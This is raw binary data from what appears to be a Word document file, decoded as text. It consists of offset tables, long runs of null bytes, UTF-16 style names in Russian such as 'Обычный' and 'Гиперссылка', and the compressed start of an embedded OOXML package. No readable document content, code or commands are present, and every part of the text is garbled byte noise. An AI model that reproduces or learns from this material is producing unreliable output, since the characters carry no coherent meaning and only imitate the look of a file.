\x04\f\0\b\0\0\x01\b\0\0\x02\b\0\0\x03\b\0\0p\b\0\0q\b\0\0r\b\0\0s\b\0\0t\b\0\0u\b\0\0v\b\0\0w\b\0\0x\b\0\0y\b\0\0z\b\0\0{\b\0\0|\b\0\0}\b\0\0~\b\0\0\x7f\b\0\0€\b\0\0\b\0\0‚\b\0\0ƒ\b\0\0„\b\0\0…\b\0\0†\b\0\0‡\b\0\0ˆ\b\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ò\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\a\0\0\x03$\x01a$\x01gdØ\x14V\0\0\x04\0\0gdØ\x14V\0\0\x1cˆ\b\0\0‰\b\0\0Š\b\0\0‹\b\0\0Œ\b\0\0\b\0\0Ž\b\0\0\b\0\0\b\0\0‘\b\0\0’\b\0\0“\b\0\0”\b\0\0•\b\0\0–\b\0\0—\b\0\0˜\b\0\0™\b\0\0š\b\0\0›\b\0\0œ\b\0\0\b\0\0ž\b\0\0Ÿ\b\0\0n	\0\0o	\0\0p	\0\0q	\0\0r	\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0ø\0\0\0\0\0\0\0\0\0\0\0\0ø\0\0\0\0\0\0\0\0\0\0\0\0ø\0\0\0\0\0\0\0\0\0\0\0\0ú\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\0\x04\0\0gdØ\x14V\0\0\x1c2\01h\x01:p‘Kó\0\x1f°‚. °ÆA!°Ð\x02"°Ð\x02#Ð\x02$Ð\x02%°\0\0\x17°Ä\x02\x18°Ä\x02\fÄ\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\x04\x11\0\x12\0\x01\0\v\x01\x0f\0\a\0\0\0\0\0\0\0\0\0\x04\0\b\0\0\0\b\0\0\0\x0e\0\0\0\x0e\0\0\0\x0e\0\0\0\x0e\0\0\0\x0e\0\0\0\x0e\0\0\0\x0e\0\0\0\x0e\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x0e\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\b\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\b\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\b\0\0\0\b\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\02\x06\0\0\x18\0\0\0À\x03\0\0Ð\x03\0\0à\x03\0\0ð\x03\0\0\0\x04\0\0\x10\x04\0\0 \x04\0\00\x04\0\0@\x04\0\0P\x04\0\0`\x04\0\0p\x04\0\0€\x04\0\0\x04\0\0À\x03\0\0Ð\x03\0\0à\x03\0\0ð\x03\0\0\0\x04\0\0\x10\x04\0\02\x06\0\0(\x02\0\0Ø\x01\0\0è\x01\0\0 \x04\0\00\x04\0\0@\x04\0\0P\x04\0\0`\x04\0\0p\x04\0\0€\x04\0\0\x04\0\0À\x03\0\0Ð\x03\0\0à\x03\0\0ð\x03\0\0\0\x04\0\0\x10\x04\0\0 \x04\0\00\x04\0\0@\x04\0\0P\x04\0\0`\x04\0\0p\x04\0\0€\x04\0\0\x04\0\0À\x03\0\0Ð\x03\0\0à\x03\0\0ð\x03\0\0\0\x04\0\0\x10\x04\0\0 \x04\0\00\x04\0\0@\x04\0\0P\x04\0\0`\x04\0\0p\x04\0\0€\x04\0\0\x04\0\0À\x03\0\0Ð\x03\0\0à\x03\0\0ð\x03\0\0\0\x04\0\0\x10\x04\0\0 \x04\0\00\x04\0\0@\x04\0\0P\x04\0\0`\x04\0\0p\x04\0\0€\x04\0\0\x04\0\0À\x03\0\0Ð\x03\0\0à\x03\0\0ð\x03\0\0\0\x04\0\0\x10\x04\0\0 \x04\0\00\x04\0\0@\x04\0\0P\x04\0\0`\x04\0\0p\x04\0\0€\x04\0\0\x04\0\0À\x03\0\0Ð\x03\0\0à\x03\0\0ð\x03\0\0\0\x04\0\0\x10\x04\0\0 \x04\0\00\x04\0\0@\x04\0\0P\x04\0\0`\x04\0\0p\x04\0\0€\x04\0\0\x04\0\08\x01\0\0X\x01\0\0ø\x01\0\0\b\x02\0\0\x18\x02\0\0V\x02\0\0~\x02\0\0\x14\0\0\0_H\x01\x04mH\x19\x04nH\x19\x04sH\x19\x04tH\x19\x04\0\0\0\0B\0\0`ñÿ\x02\0B\0\f\x14\0\0\0\0\0\0\0\0\a\0\x1e\x041\x04K\x04G\x04=\x04K\x049\x04\0\0\x02\0\0\0\x18\0CJ\x18\0_H\x01\x04aJ\x18\0mH\x19\x04sH\x19\x04tH\x19\x04\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0B\0A òÿ¡\0B\0\f\x05\0\0\0\0\0\0\0\0\x15\0\x1e\x04A\x04=\x04>\x042\x04=\x04>\x049\x04 \0H\x04@\x048\x04D\x04B\x04 \00\x041\x047\x040\x04F\x040\x04\0\0\0\0X\0i\0óÿ³\0X\0\f\x05\0\0\0\0\0\0\0\0\x0f\0\x1e\x041\x04K\x04G\x04=\x040\x04O\x04 \0B\x040\x041\x04;\x048\x04F\x040\x04\0\0\x1c\0\x17ö\x03\0\04Ö\x06\0\x01
\x03l\04Ö\x06\0\x01\x05\x03\0\0aö\x03\0\0\x02\0\v\0\0\0.\0k ôÿÁ\0.\0\0\x05\0\0\0\0\0\0\0\0
\0\x1d\x045\x04B\x04 \0A\x04?\x048\x04A\x04:\x040\x04\0\0\x02\0\f\0\0\0\0\0b\0³\0\x01\0ò\0b\0\f\x10\0\0\x19\x013\0 \x02\f\0\x10\x041\x047\x040\x04F\x04 \0A\x04?\x048\x04A\x04:\x040\x04\0\0\x17\0\x0f\0\x0f„Ð\x02\x12d\x14\x01\x01\0\x14¤È\0^„Ð\x02m$\x01\0\x18\0CJ\x16\0OJ\x03\0PJ\x03\0QJ\x03\0aJ\x16\0tH	\x044\0U ¢\0\x01\x014\0\f\0\0\0#¢\0\0\0\v\0\x13\x048\x04?\x045\x04@\x04A\x04A\x04K\x04;\x04:\x040\x04\0\0\x06\0>*\x01B*\0PK\x03\x04\x14\0\x06\0\b\0\0\0!\0‚Š¼\x13ú\0\0\0\x1c\x02\0\0\x13\0\0\0[Content_Types].xml¬‘ËjÃ0\x10E÷…þƒÐ¶Ørº(¥Ø΢Iw},Ò\x0f\x18ä±-j„4	Éßwì¸Pº\b-t#\x10bΙ{U®ã \x0e\x18“óTéU^h…d}㨫ôûî)»×*1P\x03ƒ'¬ô	“^××Wåî\x140)™¦Též9<\x18“l#¤Ü\a$yi}\x1cå\x1a;\x13À~@‡æ¶(îŒõÄHœñÄÐuù*\vD× zƒÈ/0ŠÇ° ðûù\f$€˜\vX«Ç3aZ¢Ò\x10Âà,°D0\aj~è3߶Îbãí~\x14i>ƒ\x17ØÍ\x043¿\`õ?ê/ç\x06[Ø\x0f¬¶Géâ\\x7fÄ!ý-ÛRk.“sþÔ».\x18.—·´aæ¿­?\x01\0\0ÿÿ\x03\0PK\x03\x04\x14\0\x06\0\b\0\0\0!\0¥Ö§çÀ\0\0\06\x01\0\0\v\0\0\0_rels/.rels„ÏjÃ0\f‡ï…½ƒÑ}QÒÃ\x18%v/¥C/£}\0á(\x7fh"^[Û^[ëÛOÇ\x06
